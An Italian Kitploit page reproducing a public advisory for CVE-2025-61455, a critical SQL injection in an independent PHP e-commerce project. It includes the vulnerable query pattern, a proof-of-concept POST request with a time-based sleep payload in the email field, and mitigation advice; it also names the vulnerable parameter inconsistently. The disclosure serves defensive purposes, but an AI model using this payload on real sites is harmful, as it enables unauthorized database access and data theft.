Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-61455 — Divulgazione pubblica e proof-of-concept per CVE-2025-61455, un'iniezione SQL critica in E-commerce Project v1.0, inclusi dettagli tecnici, PoC e raccomandazioni di mitigazione. | Kitploit
Strumenti/GitHubGitHub/tansique-17/cve-2025-61455
Analisi delle VulnerabilitàExploitSicurezza WebApprendimento e FormazioneRisorse Curate
GitHubtansique-17/cve-2025-61455

CVE-2025-61455

Divulgazione pubblica e proof-of-concept per CVE-2025-61455, un'iniezione SQL critica in E-commerce Project v1.0, inclusi dettagli tecnici, PoC e raccomandazioni di mitigazione.

Vedi Repository
911 mesi faNon ancora revisionato
Sito web

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛡️ Divulgazione CVE: CVE-2025-61455 — SQL Injection in Progetto E-commerce

Data di divulgazione: 14 ottobre 2025
ID CVE: CVE-2025-61455
Gravità: CRITICA (CVSS 9.8)


🧩 Riepilogo

Una vulnerabilità critica di SQL Injection esiste in E-commerce Project v1.0, in particolare nell'endpoint signup.inc.php. L'applicazione incorpora direttamente input utente non sanificati nelle query SQL, consentendo ad attaccanti non autenticati di bypassare l'autenticazione ed eseguire comandi SQL arbitrari.

A questo problema è stato assegnato l'identificatore CVE-2025-61455. Al momento della divulgazione pubblica, nessuna patch ufficiale era disponibile.


📦 Prodotto interessato

  • Vendor: Indipendente (Bhabishya-123)
  • Progetto: E-commerce
  • Versione: v1.0
  • File: signup.inc.php
  • Endpoint vulnerabile:
    https://localhost/e-commerce-main/includes/signup.inc.php

🔬 Dettagli della vulnerabilità

L'applicazione utilizza input non sanificati direttamente nelle query SQL senza alcuna validazione dell'input o prepared statement. La vulnerabilità esiste nel parametro aid del file signup.inc.php.

Un attaccante può iniettare codice SQL dannoso tramite il parametro email, consentendo attacchi di SQL injection blind basati sul tempo.

Esempio di pattern di codice vulnerabile:

$query = "SELECT * FROM table WHERE email='$email'";

Ciò consente payload di iniezione in grado di manipolare la logica delle query ed estrarre dati sensibili.


📌 Classificazione CWE

ID CWETitolo
CWE-89Neutralizzazione impropria di elementi speciali utilizzati in un comando SQL

📊 Punteggio CVSS v3.1

PunteggioGravitàStringa del vettore
9.8CRITICACVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

💥 Impatto

Uno sfruttamento riuscito potrebbe comportare:

  • ✅ Bypass completo dell'autenticazione
  • 🔓 Accesso non autorizzato a funzionalità privilegiate
  • 📊 Esfiltrazione di dati tramite SQL injection blind basata sul tempo
  • 🛠️ Potenziale manipolazione o cancellazione di dati
  • ⚠️ Compromissione completa del database backend
  • 💻 Potenziale esecuzione di codice remoto

🧪 Proof of Concept (PoC)

1. Clonare il repository

git clone https://github.com/Bhabishya-123/E-commerce.git

2. Hosting locale

Utilizzare XAMPP/LAMP per distribuire il progetto e navigare su:

http://localhost/e-commerce-main/includes/signup.inc.php

3. Iniezione del payload

Inviare la seguente richiesta HTTP dannosa:

POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=

Spiegazione:
Il parametro email contiene un payload di SQL injection basato sul tempo: '+(select*from(select(sleep(20)))a)+'

Se l'applicazione ritarda la risposta di 20 secondi, l'iniezione SQL ha avuto successo.


🔐 Raccomandazioni

  • ✅ Sostituire le query SQL dinamiche con prepared statement (mysqli_prepare() o PDO).
  • 🔍 Eseguire validazione e sanificazione dell'input per tutti gli input utente.
  • 🧱 Distribuire un Web Application Firewall (WAF) per bloccare pattern noti di SQL injection.
  • 🛡️ Condurre audit regolari del codice e test di penetrazione per una rilevazione precoce.
  • 🔒 Implementare query parametrizzate per tutte le interazioni con il database.
  • 📝 Utilizzare allowlist per la validazione dell'input dove possibile.

📆 Cronologia

EventoData
Vulnerabilità scoperta16 settembre 2025
Divulgazione pubblica13 ottobre 2025
Patch disponibile❌ Non disponibile al momento della divulgazione

🙋‍♂️ Crediti

Questa vulnerabilità è stata scoperta e divulgata in modo responsabile da:

Tansique Dasari
🔗 GitHub
✉️ [email protected]


🔗 Riferimenti

  • OWASP - SQL Injection
  • PortSwigger - SQL Injection
  • CVE-2025-61455 su CVE.org

💬 Questo advisory è pubblicato in modo indipendente a causa della mancanza di risposta da parte del vendor.

Scarica lo strumento